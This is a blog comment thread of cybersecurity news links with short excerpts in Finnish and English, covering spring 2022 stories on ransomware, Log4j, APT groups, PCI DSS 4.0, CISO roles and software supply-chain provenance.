Kun puhutaan kirjautumisista laitteille, järjestelmiin ja palveluihin, on monivaiheinen tunnistautuminen ehdottomasti parempi vaihtoehto kuin pelkkä tunnus ja salasana. Silti, jos monivaiheinen tunnistautuminen on heikosti toteutettu, voidaan sekin kiertää. Varottavista esimerkeistä kertoo Wired. Alkup.
https://www.wired.com/story/multifactor-authentication-prompt-bombing-on-the-rise/
Tomi Engdahl says:
Suomalainen Anonymous-hakkeri iskee Venäjää vastaan menetelmät kuin tiedustelupalveluilla https://www.is.fi/digitoday/art-2000008720782.html
Suomalainen Anonymous-hakkeri aloitti verkkosotansa Venäjää vastaan maan hyökättyä Ukrainaan. Operaatiot ovat muuttuneet koko ajan järeämmäksi. Toiminta on laitonta, ja hän tietää sen.
Tomi Engdahl says:
Experts Warn Defenders: Don’t Relax on Log4j
https://www.securityweek.com/experts-warn-defenders-dont-relax-log4j
It’s been four months since the Log4j issue exploded onto the internet. All the major software vendors affected by it have by now released patches – but even where companies have patched, it would be wrong to relax.
Log4j is the name of a logging software library used by many different applications. It has also become the name of an attack using the Log4j library (the attack is also known as Log4Shell). The attack is not so much a vulnerability but the manipulation of a feature of the library – and because ‘exploitation’ is merely the effect of using this feature in a malicious manner, widescale exploitation began within 48 hours of the possibility becoming public knowledge.
All that is required by an attacker is getting the log to contain a specific text message. If the library has internet access, that message effectively beacons out to a server controlled by the attacker, and the attacker can gain access.
There are two solutions: one is waiting for software vendors to release patches and implementing those patches as quickly as possible; and the other is to use basic cyber resilience (in this case blocking and tackling, or ‘default deny’ on firewalls) to prevent Log4j beaconing out to the malicious server. The problem is that many companies do not have default deny properly implemented, while in the best patching scenario there was most likely a delay of several weeks before the patch was tested, delivered and implemented.
Tomi Engdahl says:
FBI Warns of Ransomware Attacks Targeting Local Governments
https://www.securityweek.com/fbi-warns-ransomware-attacks-targeting-local-governments
The Federal Bureau of Investigation (FBI) this week warned local government entities of ransomware attacks disrupting operational services, causing public safety risks, and causing financial losses.
In a Private Industry Notification (PIN), the FBI underlined the significance of such attacks, due to the public’s dependency on services overseen by local governments, including critical utilities, education, and emergency services.
According to the FBI, local government entities within the government facilities sector (GFS) represented the second most targeted group following academia, based on victim incident reporting throughout 2021.
Last year, smaller counties and municipalities represented the majority of victimized local government agencies, “likely indicative of their cybersecurity resource and budget limitations,” the FBI says.
Based on an independently-conducted survey, local governments are the least able to prevent ransomware attacks and recover from backups, and often pay the ransom to get the data back.
Ransomware Attacks Straining Local US Governments and Public Services
https://www.ic3.gov/Media/News/2022/220330.pdf
Tomi Engdahl says:
PCI Data Security Standard v4.0 Released to Address Emerging Threats
https://www.securityweek.com/pci-data-security-standard-v40-released-address-emerging-threats
The PCI Security Standards Council (SSC), the organization that oversees the Payment Card Industry Data Security Standard (PCI DSS), this week announced the release of PCI DSS v4.0.
PCI DSS 4.0 replaces version 3.2.1, which PCI SSC released in 2018. The goal of the latest version of the standard is to “address emerging threats and technologies and enable innovative methods to combat new threats” to customer payment information.
The changes highlighted by PCI SCC include the implementation of MFA for all access to cardholder data environments, the replacement of the term “firewalls” with “network security controls” to support a broader range of security technologies, and increased flexibility for organizations to show how they are using different methods for achieving security objectives. Many of the new requirements are related to targeted risk analysis.
PCI DSS 4.0, detailed in a 360-page document, was created based on feedback from more than 200 members of the global payments industry. A summary of the changes is presented in a separate document.
Payment Card Industry Data Security Standard
https://www.pcisecuritystandards.org/documents/PCI-DSS-v4_0.pdf?agreement=true&time=1648815252915
Summary of Changes from PCI DSS Version 3.2.1 to 4.0
https://www.pcisecuritystandards.org/documents/PCI-DSS-Summary-of-Changes-v3_2_1-to-v4_0.pdf?agreement=true&time=1648815252916
Tomi Engdahl says:
The Importance of Open Source to an XDR Architecture
https://www.securityweek.com/importance-open-source-xdr-architecture
No longer satisfied with infecting files or systems, adversaries are now intent on crippling entire enterprises. Damaging supply chain, ransomware and wiper attacks are making headline news, impacting not only the organization but their stakeholders too. As threat actors’ approaches and targets change, our approach to detection and response is changing as well.
Extended Detection and Response (XDR) is now widely considered to be the most effective path forward to enable detection and response across the infrastructure, across all attack vectors, across different vendors, and across security technologies that are cloud based and on premises. Delivering on this promise requires ALL tools and ALL teams working in concert, so the “X factor” in an XDR architecture is integration. And this integration must be broad and deep so that organizations can get the most value out of their existing best-of-breed security solutions, including their free, open source tools.
Tomi Engdahl says:
Pääkirjoitus: Pankkipalveluiden häiriöihin tulee varautua https://www.kauppalehti.fi/uutiset/pankkipalveluiden-hairioihin-tulee-varautua/2d126a18-3672-42aa-becb-b5676d117c7d
Venäjän Ukrainaan kohdistaman hyökkäyssodan seurauksena kyberhyökkäysten riski on kohonnut myös Suomessa. Yhtenä niin sanotun hybridisodankäynnin muotona ovat kyberiskut kriittistä infrastruktuuria vastaan. Kriittistä infrastruktuuria ovat esimerkiksi sähkönjakelu, telekommunikaatio ja pankkitoiminnot.
Tomi Engdahl says:
ISO Files With Office Maldocs & Protected View in Office 2019 and 2021 https://blog.didierstevens.com/2022/04/04/iso-files-with-office-maldocs-protected-view-in-office-2019-and-2021/
We have seen ISO files being used to deliver malicious documents via email. There are different variants of this attack. One of the reasons to do this, is to evade “mark-of-web propagation”.
Tomi Engdahl says:
Hackers breach MailChimp’s internal tools to target crypto customers https://www.bleepingcomputer.com/news/security/hackers-breach-mailchimps-internal-tools-to-target-crypto-customers/
Email marketing firm MailChimp disclosed on Sunday that they had beenMultiple Hacker Groups Capitalizing on Ukraine Conflict for Distributing Malware hit by hackers who gained access to internal customer support and account management tools to steal audience data and conduct phishing attacks. Sunday morning, Twitter was abuzz with reports from owners of Trezor hardware cryptocurrency wallets who received phishing notifications claiming that the company suffered a data breach.
Tomi Engdahl says:
FIN7 hackers evolve toolset, work with multiple ransomware gangs https://www.bleepingcomputer.com/news/security/fin7-hackers-evolve-toolset-work-with-multiple-ransomware-gangs/
Threat analysts have compiled a detailed technical report on FIN7 operations from late 2021 to early 2022, showing that the adversary continues to be very active, evolving, and trying new monetization methods. FIN7 (a.k.a. Carbanak) is a Russian-speaking, financially motivated actor known for its resourceful and diverse set of tactics, custom-made malware, and stealthy backdoors.
Tomi Engdahl says:
New Android Spyware Uses Turla-Linked Infrastructure
https://www.securityweek.com/new-android-spyware-uses-turla-linked-infrastructure
Lab52 security researchers have dissected a new piece of Android malware that they discovered while analyzing infrastructure associated with Russian cyberespionage group Turla.
While it’s the only malware family to connect to a specific IP address associated with Turla, the spyware can’t be attributed to the infamous APT, “given its threat capabilities,” Lab52 says.
Tomi Engdahl says:
Harnessing Neurodiversity Within Cybersecurity Teams
https://www.securityweek.com/harnessing-neurodiversity-within-cybersecurity-teams
Neurodivergence, by its name, implies a different way of thinking. The question we wish to examine is whether the inclusion of this neurodiversity can bring something positive beyond the simple expansion of general diversity to and within the cybersecurity teams.
Understanding neurodivergence
The world is basically divided into those with neurotypical and those with neurodivergent ways of thinking. Neurotypical is ‘typical’ only because it is more common. Neurodivergent simply diverges from the most common. There is no choice in the type – it is fundamentally governed biologically by how the brain works in different people.
It has been said, from the ‘divergent’ viewpoint, that ‘the ‘normal’ brain is easily distractible, is obsessively social, and suffers from a deficit of attention to detail and routine.’ This is what most people have and must work through, largely using a lineal thought process.
The neurodivergent brain is not cluttered with social complications, has a finely tuned sense of detail and focus, and is not easily distracted (this is called hyperfocus). Most importantly, it has a tendency towards non-linear thinking (for which, read problem solving).
Hyperfocus and non-linear thinking have clear and obvious benefits to problem solving in cybersecurity. But neurodivergence is the minority, and like all minorities requires accommodation from the majority in order to flourish.
The two types of neurodivergence that we shall consider are classified as ADHD and ASD (formerly known as Asperger’s syndrome). It is important to note that there are different types and degrees of ADHD, and that an important (but not defining) difference between ADHD and ASD is the ability to ‘socialize’ within a typical society. Aspects of each classification can also be apparent in the other, but in general, ASD has greater difficulty in social constructs.
Hyperfocus
Neurodivergents are capable of long periods of intense concentration on a single subject. This is called hyperfocus. It is possible in neurotypicals, but the focus is likely to be disrupted by social, image and other neurotypical interruptions that will not interrupt the neurodivergent.
Non-linear thinking
The concept of non-linear thinking (sometimes described as seeing patterns in things not obviously related) is difficult to grasp – especially for the neurotypical mind. Conceptually (this is not a scientific or clinical explanation) think of it like remembering a connection between two stimuli. In cybersecurity, the memory may be that this incident may be associated with that incident and lead to this outcome.
The ability to see the relationships comes from memory. Complex memories are based on connections between different memory snippets. If we don’t have those connections in the memory, we can see neither the problem nor its solution. This is neurotypical problem solving – this can lead to this and result in that. If the incident is not within our linear conception, we do not see it.
The neurodivergent brain does not work like this. It does not rely on known connections stored in memory. Memory is a fog of unrelated incidents that have not been consciously filed as being connected. Nevertheless, the neurodivergent brain can see possible patterns and connections in this much larger fog of incidents and solve problems without being aware of how the solution is achieved.
The closest parallel for neurotypical brains is the idea of ‘sleeping on a problem’. It is not uncommon to be faced with a problem that is so difficult that we give up – yet wake up the next day knowing there is a simple solution. It is our subconscious that works on and solves the problem – possibly in a non-linear fashion – while we are asleep.
Accommodating neurodiversity in the security team
The potential power of harnessing hyperfocus and non-linear problem solving in cybersecurity is obvious. But neurodivergency must be accommodated. The potential for these cybersecurity strengths is not a constant. There will be times where the disadvantages of the conditions are in the ascendency. We’ve all heard the ‘squirrel’ jokes. These can be conceptually accurate but should be considered insensitive (unless both parties are in the same minority). Those periods need to be accepted and helped where possible, and not blindly criticized.
So understanding is key to employing neurodivergency within the security team.
Tomi Engdahl says:
Aaron Schaffer / Washington Post:
The US State Department announces the Bureau of Cyberspace and Digital Policy, starting with 60+ staff and plans to add 30 more in 2022
https://www.washingtonpost.com/politics/2022/04/04/its-big-day-state-department-us-cyberdiplomacy/
Tomi Engdahl says:
US State Department Launches Cyberspace and Digital Diplomacy Bureau
https://www.securityweek.com/us-state-department-launches-cyberspace-and-digital-diplomacy-bureau
The US Department of State on Monday announced the creation of the Bureau of Cyberspace and Digital Policy (CDP).
The new entity was created to deal with national security challenges, but also with the implications of cyberspace and digital technologies and policies on US values.
The CDP bureau was created to lead and coordinate the Department’s cyberspace and digital diplomacy operations, to promote responsible cyberspace behavior and policies.
“The Bureau addresses the national security challenges, economic opportunities, and values considerations presented by cyberspace, digital technologies, and digital policy and promotes standards and norms that are fair, transparent, and support our values,” the Department of State notes.
Three policy units will be part of the CDP bureau, namely Digital Freedom, International Cyberspace Security, and International Information and Communications Policy.
Tomi Engdahl says:
Why Some CISOs Fail
https://www.securityweek.com/why-some-cisos-fail
The CISO’s role is not to simply protect IT against risk – it is to defend the work of all departments, and the profitability of the entire business
The role of Chief Information Security Officer (CISO) is new. It’s just 25 years since Steve Katz became the world’s first known CISO. There is no universally accepted definition of the role, its methods or its responsibilities; and CISOs are left to find or forge their own paths. Some fail to choose or find the right path.
Adolescence
“I would say that the role is in its adolescence right now; not yet fully formed,” says Ben Smith, Field CTO at NetWitness. “We think it’s headed in the right direction, but there’s always room for improvement and growth.”
Adolescence is the age of rebelliousness. “But it’s also the beginning of maturity,” says Chris Morales, CISO at Netenrich.
Reporting
Confusion over the proper role for the CISO can be seen in the ongoing debate over the correct reporting structure. The majority of CISOs report to the CIO, but the number is slowly diminishing. CISOs are demanding, and businesses are recognizing, that however closely the CISO and CIO need to work together, one should neither be subservient nor dependent on the other. There is an inherent conflict of interest in this relationship that can only be solved by each party being on an equal footing.
Morales, who is a successful CISO with a clear sense of purpose, reports to his CEO. “I insisted from the beginning,” he told SecurityWeek. “It was a condition of me accepting the position.”
The precise reporting structure is not critical beyond three conditions: the CISO must have access to the board, should not report to the CIO, and should have his own security budget rather than a percentage of the IT budget controlled by the CIO.
The businessman
The growing maturity of the CISO role can also be seen in the increasing recognition of the need for the CISO to be a businessman, perhaps above and beyond a technologist. This is a process in transition since the majority of existing CISOs have come up ‘through the ranks’ and have a natural grounding in technology. But these CISOs are being forced to acquire business skills to properly fulfill their roles, and to a large extent, their continuing success is dependent on how well they learn these skills.
The need for a CISO to have business skills to better protect the business focus of the company is growing. “I would say,” comments Smith, “that if you enter into a CISO role with the expectation that you’re going to be the most technically capable employee in the security function you are going to fail because that’s not what today’s CISO is all about.” He goes further to say that the ideal makeup for the CISO is a businessman with technology understanding – but if he was forced to choose between a pure technologist and a pure businessman for this role, he would choose the businessman.
The negotiator
An important aspect of being a businessman is the ability to negotiate – and this is essential for the businessman CISO. Traditionally, the CISO has become known as Mr. No. The CISO is responsible for security, and it is too easy to say, or be perceived as saying, ‘No, you can’t do that because it is not secure.’
This can lead to a negative perception of the whole role of cybersecurity, and – in extreme – the exclusion of the CISO from other business discussions. It is better for the CISO to engineer the environment in which he/she can say, ‘Yes, we can do that so long as we do it this way…’ This requires a high level of communication and negotiation skills, and a good rapport with other C-Suite members – especially, of course, with the CIO.
Early attempts to sell the value of security were clumsy. A common claim has been that the business is like a car and security is the brake pedal – it gives the driver confidence to drive faster. But the analogy doesn’t bear analysis.
The role of the modern CISO has become heavily dependent on communication, and the ability to negotiate a mutually acceptable compromise. Without these skills, it is difficult to see how the modern CISO will succeed.
How to succeed as a CISO
The modern business is a complex relationship between information technology, marketing, finance, human resources, legal and other departments. The successful CISO’s role is not to simply protect IT against risk – it is to defend the work of all the departments, and the profitability of the entire business.
To achieve this, the CISO needs to shed his purely technological mantle and to develop new skills of communication, negotiation and willingness to compromise in order to succeed. Metaphorically, the CISO needs to emerge from behind his desk in a corner of the IT department and take or forge a place in the wider business. This is the successful CISO of the future.
Tomi Engdahl says:
Cybersecurity Mesh: IT’s Answer to Cloud Security
https://www.darkreading.com/operations/cybersecurity-mesh-it-s-answer-to-cloud-security
With a properly functioning cybersecurity mesh architecture, one can guarantee safe, authorized access to data from any access point.
The term “cybersecurity mesh” has been around for a couple of years now, but it’s making the rounds again after Gartner declared it the second-highest strategic trend of 2022. To be fair, it is a good term, as it adequately expands upon the zero-trust paradigm. Given that zero trust has been around for nearly two decades, most are familiar with the zero-trust network (ZTN) model. It is the idea that all network access requests should be considered unreliable until proven otherwise.
In a zero-trust environment, all subjects are continuously vetted; all traffic is encrypted; and user health, device health, and session context are all assessed before access is granted to the network. The principle of least privilege is employed, meaning that users are granted access to the least amount of network data for the shortest amount of time necessary to complete a given task. Lastly, multifactor authentication (MFA) and user and entity behavior analytics (UEBA) are employed to protect the network.
The general consensus is that zero-trust security architecture is the way to go, so why do we need this new term, cybersecurity mesh architecture (CSMA)? What was the impetus behind CSMA? In short, the global pandemic. The pandemic created a paradigm shift, whereby organizations rushed to facilitate remote work and cloud migration. IT personnel were faced with the challenge of managing a host of new assets, most of which were well outside of the traditional security perimeter. This all led to the popularization of CSMA.
What Is CSMA?
According to Gartner, CSMA is “a flexible, composable architecture that integrates widely distributed and disparate security services.” Although described as an architecture, CSMA is arguably more of a strategy; it’s an initiative that brings organizations’ security tools closer to the assets that they protect.
An extension of zero trust, CSMA creates unique perimeters around every person, machine, and entity. Much like a regular ZTN model, the identity and context of users and devices are considered; for example, the identity of a person, time of day, and location could be assessed before access is granted. However, with CSMA, things are taken a step further. There are now as many perimeters as there are access points. One can think of this as a form of microsegmentation, whereby every single device and access port is surrounded by a security perimeter.
Mesh architecture moves control ports closer to the assets they need to protect; however, control ultimately still resides in a centralized point. A centralized authority manages all the security perimeters.
Another way to think about CSMA is as an end-to-end ZTN with security tools that are no longer siloed. With CSMA, organizations are encouraged to deploy security solutions that work seamlessly together, rather than security tools working in silos. According to Gartner, CSMA provides this collaborative cybersecurity structure via four different layers.
CSMA’s Supportive Layers
Per Gartner, the supportive layers are security analytics and intelligence; distributed identity fabric; consolidated policy and posture management
Distributed identity fabric denotes a layer comprised of data and connected processes. Within this layer, analytics tools continuously assess data points from disparate applications; these tools not only actively recommend where data should be used and modified, but they also help to differentiate between genuine, approved users and malicious attackers.
Consolidated policy and posture management is the layer through which IT personnel can define application access policies for users and devices — all from a central location.
These layers, which can be thought of as the “data security mesh,” all exist beneath the network layer; put differently, they work together to monitor where data is used, stored, and shared by every user and device in the network. With a properly functioning CSMA, one can guarantee safe, authorized access to data from any access point.
Tomi Engdahl says:
Symantec: Chinese APT Group Targeting Global MSPs
https://www.securityweek.com/symantec-chinese-apt-group-targeting-global-msps
Malware hunters at Broadcom’s Symantec division have spotted signs that a long-running cyberespionage campaign linked to Chinese nation-state hackers is now going after managed service providers (MSPs) with a more global footprint.
In a report issued Tuesday, Symantec said it observed a group known as Cicada (APT10, Stone Panda) expanding its target list to include government, legal, religious, and non-governmental organizations (NGOs) in multiple countries around the world, including in Europe, Asia, and North America.
The company noted that Cicada’s initial activity several years ago was heavily focused on Japanese-linked companies but warned that the group is now hitting managed service providers (MSPs) around the world.
In several newer cases, Symantec’s researchers found evidence that Microsoft Exchange Servers are an entry point for the attackers, suggesting the possibility that a known, unpatched vulnerability in Microsoft Exchange may have been used to gain access to victim networks in some cases.
Tomi Engdahl says:
Verkkoon piirretty viiva
https://yle.fi/uutiset/3-12370108
Kybersota on julistettu alkaneeksi useita kertoja viime vuosikymmenien aikana. Jälkikäteen julistukset ovat paljastuneet ennenaikaisiksi. Onko nyt toisin?
Sähköt katkesivat juuri ennen puoltayötä. Joulukuussa 2016 viidennes Kiovan kaupungista pimeni tunniksi, kun kyberhyökkäys tuhosi sähkönjakelukeskuksen pääkaupungin ulkopuolella.
Kyseessä oli erittäin edistynyt haittaohjelma, joka oli suunniteltu juuri Ukrainan sähkönjakeluverkkoa varten. Se oli kehittyneempi kuin vuotta aikaisemmin Länsi-Ukrainassa sähköt yli 220 000 asukkaalta katkaissut kyberisku, jossa hakkerit manuaalisesti katkaisivat virran kulun. Nyt haittaohjelma pystyi toimimaan itsenäisesti.
Ukrainan sähköverkkoon tehdyt iskut olivat poikkeuksellisia, sillä ne kohdistuivat yhteiskunnan kriittiseen infrastruktuuriin. Poikkeuksellista oli myös se, että digitaalisilla iskuilla onnistuttiin tekemään fyysistä tuhoa.
Tomi Engdahl says:
Build A TPM Module For Your Server
https://hackaday.com/2022/04/06/build-a-tpm-module-for-your-server/
One of the big stories surrounding the announcement of Windows 11 was that it would require support for TPM 2.0, or Trusted Platform Module, to run. This takes the form of an on-board cryptographic processor, which Microsoft claims will help against malware, but which perhaps more importantly for Redmond, can be used to enforce DRM. Part of the standard involves a hardware module, and [Zane] has built a couple of them for ASrock server motherboards.
The chip in question is the Infineon SLB9965, which with a bit of research was found to map more or less directly to the pins of the TPM socket on the motherboard. The interesting thing here lies in the background research it gives into TPMs, and furthermore the links to other resources dealing with the topic. The chances are that most readers needing a TPM will simply buy one, but all knowledge is useful when it comes to these things.
DIY TPM Module
https://zanechua.com/blog/diy-tpm-module
My three most recent builds were using ASRock Rack server boards. The two boards X470D4U and the ROMED8-2T use the TPM2-S/INFINEON module. The one that is different is the X570D4I-2T which uses the TPM2-SLI module. I looked around and couldn’t find a place to buy the TPM2-SLI module, so I decided to make my own. Since I was making one, I figured I would make the modules for the other boards too even though they were available for purchase.
I run Windows 11 on the X470D4U and ESXi on the other two. ESXi does not support the fTPM implementation for host attestation, hence the need for a hardware TPM module instead.
This proved to be beneficial for me on the X470D4U for two reasons:
The latest bios available contains the AMD AGESA of 1.2.0.0 which has the stuttering issue when the fTPM is utilized on machines running Windows 11
The GPU is inserted in the last slot of the board. The TPM2-S module is a vertical module and this would prevent my GPU from being seated into the board itself
Tomi Engdahl says:
Viime aikojen tapahtumat huomioiden nyt on erittäin hyvä hetki päivittää organisaatiosi riskikartoitus ajan tasalle. Julkisella sektorilla ja mm. kuntaomisteisilla yhtiöillä on merkittävä osuus tärkeästä infrastruktuurista ylläpidettävänään. Tähän liittyvään digitaalisen ja fyysisen turvallisuuden arviointia on varmasti hyvä nyt tehdä nykyvälineillä tai hankkia sitä helpottava ratkaisu….. lue lisää:
https://softwave.fi/ajankohtaista/the-hetki-laittaa-riskienhallinta-kuntoon/
Tomi Engdahl says:
Improving software supply chain security with tamper-proof builds https://security.googleblog.com/2022/04/improving-software-supply-chain.html
This blog post describes a new method of generating non-forgeable provenance using GitHub Actions workflows for isolation and Sigstore’s signing tools for authenticity. Using this approach, projects building on GitHub runners can achieve SLSA 3 (the third of four progressive SLSA “levels”), which affirms to consumers that your artifacts are authentic and trustworthy.
Tomi Engdahl says:
Adversarial Threat Report April 2022
https://about.fb.com/wp-content/uploads/2022/04/Meta-Quarterly-Adversarial-Threat-Report_Q1-2022.pdf
Our findings also include an update on our enforcements in Ukraine, including attempts by. previously disrupted state and non-state actors to come back on the platform, in addition to. spam networks using deceptive tactics to monetize public attention to the ongoing war.
[+other findings]
Tomi Engdahl says:
What is BIMI and how is it supposed to help with Phishing
https://isc.sans.edu/diary/rss/28528
The latest attempt to find a better way to authenticate an email sender visually is “BIMI,” short for “Brand Indicators for Message Identification” [1]. It will add a company logo to each email, and the logo may be verified. Of course, to make this work, we need yet another DNS TXT record: [selector]._bimi.[domain]. The [selector] can decide which logo will be used. But typically, you should see default._bimi.example.com.
Tomi Engdahl says:
Companies are more prepared to pay ransoms than ever before https://www.tripwire.com/state-of-security/featured/companies-are-more-prepared-to-pay-ransoms-than-ever-before/
The ninth annual Cyberthreat Defense Report (CDR), produced by CyberEdge Group, shows that not only has there been a substantial increase in the percentage of companies that pay ransoms, but the average size of ransomware payments also increased significantly.
Tomi Engdahl says:
The Original APT: Advanced Persistent Teenagers https://krebsonsecurity.com/2022/04/the-original-apt-advanced-persistent-teenagers/
Many organizations are already struggling to combat cybersecurity threats from ransomware purveyors and state-sponsored hacking groups, both of which tend to take days or weeks to pivot from an opportunistic malware infection to a full blown data breach. But few organizations have a playbook for responding to the kinds of virtual “smash and grab” attacks we’ve seen recently from LAPSUS$, a juvenile data extortion group whose short-lived, low-tech and remarkably effective tactics have put some of the world’s biggest corporations on edge.
Tomi Engdahl says:
API Threat Research: Server-side Request Forgery on FinTech Platform Enabled Administrative Account Takeover https://salt.security/blog/api-threat-research-server-side-request-forgery-on-fintech-platform-enabled-administrative-account-takeover
[W]e investigated the platforms of a large US-based FinTech company.
This company offers a “digital transformation” service for banks of all sizes, allowing them to switch many of their traditional banking services to online services. [...] As a result of API vulnerabilities that our researchers identified, they were able to launch attacks
where: Attackers could gain administrative access to the banking system using this platform [...]. How can other companies prevent such a potential disaster? User controlled input is the big culprit. Such parameters should never be blindly trusted. Software and API developers should always make sure to apply as many protections as possible to any user input, especially if the input values are susceptible to attacks such as URL values that may lead to SSRF or other vulnerability classes.
Tomi Engdahl says:
Voice of the Modern Developer: Insights From 400+ Developers https://www.tromzo.com/blog/voice-of-the-modern-developer
Instead of propagating the blame game between Dev and AppSec teams, we believe it is more productive to better understand the challenges developers face, how they feel about security, and what organizations can do to bake security into the development process. To that end, we commissioned a survey of over 400 AppSec professionals for our first annual State of Modern Application Security Report.. [Key findings:] 42% of developers push vulnerable code once per month, Developers fix only 32% of vulnerabilities, A third of vulnerabilities are noise, 33% believe that developers and security are siloed.
Tomi Engdahl says:
Healthcare and the Other CIA
https://www.securityweek.com/healthcare-and-other-cia
For IT professionals, the acronym “CIA” refers to the Confidentiality, Integrity and Availability of information, not the Central Intelligence Agency. However, given the current threat level to data security, IT teams may wish they could get a little help from people with intelligence community tradecraft experience.
Healthcare has become a prime target for what amounts to data espionage. According to the U.S. Department of Health and Human Services, there were 618 breaches and attacks serious enough to affect at least 500 people in 2021, and there’s no reason to think 2022 will be any better.
Two specific types of exploits are being seen with disturbing frequency. The first is out-and-out theft of patient records for financial gain. A typical example is the breach of a third-party system from Dental Care Alliance. This exploit impacted more than 1 million patients,10% of which had their bank account numbers stolen.
The second type of exploit is ransomware, which is even more devastating, because inability to access patient data can put their lives at risk. There are plenty of statistics available about the increasing number of ransomware attacks on hospitals and healthcare systems in general, but the most frightening development is the rise of Ransomware-as-a-Service (RaaS). Anyone reading this article could log on to the dark web and easily obtain ransomware capabilities.
More sophisticated RaaS systems are priced in the thousands of dollars, but many of them come with commercial-style features like 24/7 technical support. And the rewards of a successful attack can be huge. In 2021, IBM reported the average cost of a cyberattack to a healthcare system to be $4.62 million per incident, much of which went into attackers’ pockets.
Tomi Engdahl says:
https://www.securityweek.com/healthcare-and-other-cia
Fortunately, effective defenses do exist. Many of them work quite well, but they all come with pluses and minuses. Here’s a summary:
● Training: When employees are trained to avoid risky behavior, such as clicking on links in an email from an unknown source, the threat of attack is reduced. However, human error is a fact of life, and no amount of training can ensure employees will never make a mistake.
● Upgrades: Software updates often include important security improvements along with other features. However, upgrades can be complicated to install, require testing, and are notorious for crashing systems. Recently, the installation of a recommended update from an international software vendor resulted in a major incident that took down 20 National Health Service IT systems in the UK.
● Cybersecurity software: A wide (and sometimes confusing) variety of applications are available to detect and mitigate cyber attacks, and in general they work. Unfortunately, they are often beyond the budget of healthcare organizations. They sometimes have steep learning curves and are typically incompatible with one another. Also, because the cybercrime community is constantly evolving new forms of attack, these applications can quickly become outdated.
● Best Practices: Adopting best practices such as end-to-end encryption, role-based access and least-privileged access controls, mandatory password updates and the like all contribute to data security. However, all of these require a significant commitment of resources for administration, and can introduce significant friction into the system.
Tomi Engdahl says:
Zoom Paid Out $1.8 Million in Bug Bounties in 2021
https://www.securityweek.com/zoom-paid-out-18-million-bug-bounties-2021
Video communications giant Zoom this week announced that it paid out roughly $1.8 million in bug bounty rewards in 2021.
The company launched its bug bounty program on the HackerOne platform in 2019, and says it has handed out more than $2.4 million in bounty payouts to date.
Although only 401 vulnerability reports were rewarded last year, the bug bounty program has attracted more than 800 hackers, the company says.
“This past year, our Vulnerability Management and Bug Bounty (VMBB) team focused on navigating a competitive recruitment landscape and attracting more ‘rock star’ security researchers to join our program by providing them with an excellent experience,” Zoom says.
Tomi Engdahl says:
BlackCat Ransomware Targets Industrial Companies
https://www.securityweek.com/blackcat-ransomware-targets-industrial-companies
A data theft tool used by the ransomware group tracked as BlackCat, ALPHV and Noberus, suggests that the cybercriminals are increasingly interested in targeting industrial organizations.
The BlackCat ransomware group, which operates under a ransomware-as-a-service (RaaS) model, emerged in November 2021 and has since targeted organizations worldwide, including many in the United States.
Several cybersecurity firms have found links between BlackCat and the BlackMatter and DarkSide ransomware operations. It appears that the BlackCat team consists of various RaaS group affiliates, including BlackMatter, rather than being a rebranding of BlackMatter.
In a blog post published on Thursday, Kaspersky also provided information on the connection between BlackMatter and BlackCat, focusing on a data exfiltration tool called Fendr and ExMatter.
Fendr was described by Symantec last year as a custom data exfiltration tool that enabled BlackMatter operators to easily steal data of value from compromised systems. The tool, previously seen only in BlackMatter attacks, is designed to collect specific file types and upload them to the cybercriminals’ servers before file-encrypting ransomware is deployed. The stolen data can then be used to pressure the victim into paying up.
In a report published in February, industrial cybersecurity firm Claroty said ransomware often hits industrial control systems (ICS) or other operational technology (OT) environments, and impact is often significant.
Ransomware Often Hits Industrial Systems, With Significant Impact: Survey
https://www.securityweek.com/ransomware-often-hits-industrial-systems-significant-impact-survey
Ransomware attacks in many cases hit industrial control systems (ICS) or operational technology (OT) environments, and impact is often significant, according to a report published on Thursday by IoT and industrial cybersecurity company Claroty.
Claroty’s “Global State of Industrial Cybersecurity” report is based on a Pollfish survey of 1,100 IT and OT security professionals in the United States, Europe and the APAC region. More than half of respondents work for enterprises that have an annual revenue exceeding $1 billion. The survey was conducted in September 2021.
Roughly 80% of respondents admitted that their organization had experienced a ransomware attack within the past year, and nearly half said the incident had impacted their ICS/OT environment.
Only 15% of respondents said there was no impact or minimal impact on operations, and nearly 50% said there was significant impact. Seven percent said the incident resulted in a full operations shutdown that lasted for more than a week.
The cyberattack was disclosed to both authorities and shareholders in most cases, but some companies apparently did not inform anyone.
Tomi Engdahl says:
Google Teams Up With GitHub for Supply Chain Security
https://www.securityweek.com/google-teams-github-supply-chain-security
Google has teamed up with GitHub for a solution that should help prevent software supply chain attacks such as the ones that affected SolarWinds and Codecov.
Google’s open source security team explained that in the SolarWinds attack hackers gained control of a build server and injected malicious artifacts into a build platform. In the Codecov attack, threat actors bypassed trusted builders to upload their artifacts.
“Each of these attacks could have been prevented if there were a way to detect that the delivered artifacts diverged from the expected origin of the software,” Google explained. “But until now, generating verifiable information that described where, when, and how software artifacts were produced (information known as provenance) was difficult. This information allows users to trace artifacts verifiably back to the source and develop risk-based policies around what they consume.”
Google and GitHub now propose a new method for generating what they describe as “non-forgeable provenance.” The method leverages GitHub Actions workflows for isolation and Sigstore signing tools for authenticity.
The goal is to help projects building on GitHub runners achieve a high SLSA level, which reassures consumers that their artifacts are trustworthy and authentic.
SLSA (Supply-chain Levels for Software Artifacts) is a framework designed for improving the integrity of a project by enabling users to trace software from the final version back to its source code. In this case, the goal is to achieve SLSA level 3 out of a total of four levels.
Improving software supply chain security with tamper-proof builds
April 7, 2022
https://security.googleblog.com/2022/04/improving-software-supply-chain.html
Many of the recent high-profile software attacks that have alarmed open-source users globally were consequences of supply chain integrity vulnerabilities: attackers gained control of a build server to use malicious source files, inject malicious artifacts into a compromised build platform, and bypass trusted builders to upload malicious artifacts. Each of these attacks could have been prevented if there were a way to detect that the delivered artifacts diverged from the expected origin of the software. But until now, generating verifiable information that described where, when, and how software artifacts were produced (information known as provenance) was difficult. This information allows users to trace artifacts verifiably back to the source and develop risk-based policies around what they consume. Currently, provenance generation is not widely supported, and solutions that do exist may require migrating build processes to services like Tekton Chains.
This blog post describes a new method of generating non-forgeable provenance using GitHub Actions workflows for isolation and Sigstore’s signing tools for authenticity. Using this approach, projects building on GitHub runners can achieve SLSA 3 (the third of four progressive SLSA “levels”), which affirms to consumers that your artifacts are authentic and trustworthy.
SLSA (“Supply-chain Levels for Software Artifacts”) is a framework to help improve the integrity of your project throughout its development cycle, allowing consumers to trace the final piece of software you release all the way back to the source. Achieving a high SLSA level helps to improve the trust that your artifacts are what you say they are.
https://slsa.dev/
Supply chain Levels for Software Artifacts, or SLSA (salsa).
